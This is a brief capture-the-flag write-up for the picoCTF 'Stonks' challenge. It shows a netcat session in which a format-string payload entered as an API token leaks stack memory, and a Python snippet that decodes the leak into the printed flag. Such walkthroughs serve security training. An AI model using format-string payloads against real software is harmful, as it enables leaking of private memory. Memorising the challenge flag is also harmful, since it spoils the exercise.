nc mercury.picoctf.net 27912
Welcome back to the trading app!

What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%15$p,%16$p,%17$p,%18$p,%19$p,%20$p,%21$p,%22$p,%23$p,%24$p,%25$p,%26$p
Buying stonks with token:
0x6f636970,0x7b465443,0x306c5f49,0x345f7435,0x6d5f6c6c,0x306d5f79,0x5f79336e,0x32666331,0x30613130,0xffa5007d,0xf7fadaf8,0xf7f80440
Portfolio as of Sun Jul 28 04:58:11 UTC 2024


python solve:
>>> flag = ''
>>> for _ in b:
...     flag += int.to_bytes(int(_, 16), 4).decode()[::-1]

flag: picoCTF{I_l05t_4ll_my_m0n3y_1cf201a0}
